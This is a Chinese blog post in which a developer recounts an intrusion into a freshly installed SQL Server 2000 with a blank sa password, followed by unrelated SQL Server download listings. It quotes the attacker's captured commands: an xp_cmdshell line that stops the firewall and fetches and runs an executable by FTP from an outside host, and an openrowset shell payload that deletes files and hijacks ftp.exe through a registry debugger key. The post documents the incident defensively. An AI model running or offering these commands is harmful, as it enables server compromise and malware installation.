本来正在使用Eclipse的断点调试结合事件探查器观察一些SQL语句的执行,
突然发现很奇怪的现象,在没有执行任何语句的时候,事件探查器不断打印出SQLServer服务器的执行记录。
粗看一下,发现这样的语句:
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("cmd /c attrib -s -h wbem\we.exe&del wbem\we.exe&del X.EXE® delete HKEY_CLASSES_ROOT\WScript.Shell /f® delete HKEY_CLASSES_ROOT\WScript.Shell.1 /f® delete HKEY_CLASSES_ROOT\Wifayy /f® add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\currentversion\image file execution options\ftp.exe /v Debugger /t REG_SZ /d ctfmon.exe /f")')
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword
而且还正在不停的执行,由于是今天刚重新装好的电脑以及SQL2000,没有设置sa密码。没有安装杀毒软件,
赶快把服务器停掉、把网络断掉。
首先检查一下,任务管理器多出来的进程:
在C盘上搜索了一下最新的文件,大概多出了:
c:\cmd.exe
c:\windows\system32\cmd 没有扩展名,打开是一个文本文件,内容是:
open 2yxy.8800.org
123
123
binary
get 1.exe C:\cmd.exe
bye
c:\windows\system32\1.exe 图标是JPG文件的图标,属性写的是QQ2010,毫无疑问是病毒伪装的
c:\windows\system32\c.exe
还有好几个文件。太可恨了!!
使用AutoRuns查了一下,多出来的自动启动的服务:
现在把事件探查器的记录结果记在下面,有时间再分析吧:
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
exec xp_cmdshell 'cmd.exe /c net stop sharedaccess&@echo open 2yxy.8800.org> cmd&@echo 123>> cmd&@echo 123>> cmd&@echo binary >> cmd&@echo get 1.exe C:\cmd.exe>> cmd&@echo bye >> cmd&ftp -s:cmd &C:\cmd.exe&del cmd /q /f&ping -n 3 127.0.0.1>nul&del C:\cmd.exe /f'
SELECT N'Testing Connection...'
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
-- sp_sqlagent_get_perf_counters
CREATE TABLE #temp
(
performance_condition NVARCHAR(1024) COLLATE database_default NOT NULL
)
-- sp_sqlagent_get_perf_counters
INSERT INTO #temp VALUES (N'dummy')
太多了,不再记录了,跟踪记录保存下来了。
对了对方的ApplicationName是ISQL-32
真是火大了,TNND!!!
- 大小: 54.7 KB
- 大小: 48.9 KB
分享到:
相关推荐
1.SQL Server 2014简介.mp4 10.SQL Server 2014定义表主键、外键.mp4 11.SQL Server 2014新增表记录.mp4 12.SQL Server 2014查询表记录.mp4 13.SQL Server 2014修改表记录.mp4 14.SQL Server 2014删除表记录....
根据提供的标题、描述、标签及部分内容,本文将详细介绍一种声称针对Microsoft SQL Server的SA权限入侵方法。请注意,这里介绍的内容仅供安全研究与防御目的使用,任何未经授权的入侵行为均属非法。 ### 一、背景...
SQL Server连接工具是数据库管理员和开发人员用于与Microsoft SQL Server交互的重要软件。这些工具提供了多种功能,包括数据库的创建、管理、查询、备份、恢复以及性能优化等。在本篇文章中,我们将深入探讨SQL ...
压缩包内附带链接服务器创建脚本方式,此SQL Server Native Client 10.0无病毒,有64位和32位可供选择。...安装完SQL Server Native Client 10.0后再创建个链接服务器,可以实现高版本SQLserver远程链接SQLserver2000。
标题中的“sqlserver驱动2012版”指的是SQL Server Native Client 2012,这是微软为SQL Server设计的一款数据库访问接口。SQL Server Native Client(简称SQLNCLI)是用于与SQL Server交互的一种客户端库,它包含了...
SQL Server 2019是Microsoft推出的一款关系型数据库管理系统,是SQL Server系列中的一个重要版本。它提供了强大的数据存储、处理和分析能力,广泛应用于企业级数据库应用开发和数据分析。在本安装包中,主要包含的是...
SQLServer+ 免安装版 SQLServer+是在原有SQLServer2000的基础上改善了数据库安装的繁锁性,让软件企业在发布基于SQLServer2000数据库软件的时候,只要把软件打包进入安装包而不需要再单独安装数据库,也不需要另外...
在“Microsoft SQL Server Management Stdio”中,展开"SQL Server 组",鼠标右键点击 SQL Server 服务器的名称,然后选择"属性",再选择"安全性"选项卡,在"身份验证"下,选择"SQL Server 和 Windows 身份验证模式...
SQL Server客户端连接工具是数据库管理员和开发人员用来与Microsoft SQL Server进行交互的重要工具。它提供了图形用户界面(GUI)和命令行选项,使得用户能够轻松地执行查询、管理数据库对象以及进行其他数据库维护...
SQL Server Native Client 10.0 是微软推出的一款用于访问SQL Server数据库的客户端库,它在SQL Server 2005版本中首次引入,并在后续的SQL Server 2008中得到进一步增强。这个库提供了OLE DB供应商和ODBC驱动程序,...
SQL Server Native Client 10.0 是微软推出的一款专门用于与SQL Server 2008及后续版本交互的客户端库,它集成了ODBC(Open Database Connectivity)和OLE DB(Object Linking and Embedding, Database)接口。...
SQL Server客户端安装包是用于与Microsoft SQL Server进行交互的软件组件集合,它包含了连接到SQL Server、执行查询、管理数据库以及进行数据导入导出等任务所需的工具。在本压缩包中,主要包含了一个名为"SQL ...
Sql Server 2014 安装包 SQL Server 2014是微软推出的一款关系型数据库管理系统,它在企业级数据管理和分析领域扮演着重要的角色。此安装包包含两个主要组件:SQL Management Studio和SQL Server Express。 1. **...
SQLServer2005_BC.msi 文件是这个向后兼容组件的安装程序,它包含了用于在更新的SQL Server环境中模拟SQL Server 2005环境的特定库和接口。安装此组件后,用户可以继续使用那些设计时依赖SQL Server 2005特性的应用...
Sql Server 2005 打开 Sql Server 2008 mdf 文件数据库转换是指将 Sql Server 2008 中的数据库文件(mdf 文件)转换为 Sql Server 2005 可以识别的格式,以便在 Sql Server 2005 中使用。这种转换过程需要使用 Sql ...
首先,标题中的"sqlserver自动生成sql语句工具"指的是可以分析SQL Server数据库结构和数据,自动生成对应的SQL创建语句的软件。这种工具通常能帮助数据库管理员快速获取数据库的定义,便于备份、迁移或在其他环境中...
[Microsoft Press] Microsoft SQL Server 2012 技术内幕 (英文版) [Microsoft Press] Microsoft SQL Server 2012 Internals (E-Book) ☆ 图书概要:☆ Dive deep inside the architecture of SQL Server 2012 ...
基于改进Apriori算法的SQL Server数据库入侵识别方法 数据库入侵识别是指对数据库中的恶意操作和非法访问进行识别和检测的过程。传统的数据库入侵识别方法主要集中于识别入侵行为数据,但是这种方法存在一些缺陷,...
本压缩包包含了针对32位和64位系统的两个补丁:SQLServer2005_BC.msi 和 SQLServer2005_BC_x64.msi,主要目的是为了提升SQL Server 2005 Business Intelligence (BI)组件的兼容性和性能。 SQL Server 2005 Business...
"sqlserver离线安装包" 提供了这样一种解决方案,使得我们可以在无网络的情况下完成 SQL Server 的部署。 离线安装通常涉及到以下几个关键步骤和知识点: 1. **下载完整安装包**: 要进行离线安装,首先你需要在有...